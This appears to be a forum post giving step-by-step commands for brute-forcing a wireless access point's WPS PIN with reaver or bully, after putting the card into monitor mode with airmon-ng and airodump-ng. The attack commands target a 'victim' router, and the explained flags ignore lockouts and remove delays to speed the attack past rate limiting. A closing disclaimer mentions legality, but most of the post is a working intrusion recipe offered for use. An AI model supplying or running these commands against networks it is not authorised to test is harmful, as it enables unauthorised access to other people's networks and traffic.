There really is no good tutorial because all environments are different. Some APs have mac filtering, static IP address assignment, different security types, rate limiting, etc. Anyways...
Instead of bully, I recommend you use reaver. It is included in the Kali package by default and does almost the same exact thing as bully, just I think it has a few more advanced features. You can find a full tutorial here. I would try:
Code:
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -c CHANNEL NUMBER -a -S -L -N -d 0 -b MAC ADDR OF VICTIM -vv
*Be sure to stop airodump before running reaver*
-a auto selects certain features, -S means uses small dh keys for poor hardware on the victim AP so the router doesn't slow and freeze up (speeds up attacks, -L means ignore lockouts (you may want to shut this off if the AP has rate limiting), -N means no nacks (speeds up the attack), -d 0 means after 1 pin succeeds, the next one will be tried right away, (takes away the 1 second delay between attempts), and -vv is just verbose mode.
If you really want to use bully, commands are listed here. If i were to run this, I would do this:
Code:
airmon-ng start wlan0
airodump-ng mon0
bully -b MAC ADDR OF VICTIM -A -vv mon0
*Be sure to stop airodump before running bully*
-A is no nacks like mentioned above, and -vv is verbose mode.
Remember, hacking into a network that is not yours or that you do not have permission to is illegal. I am not responsibefor what you do with this information!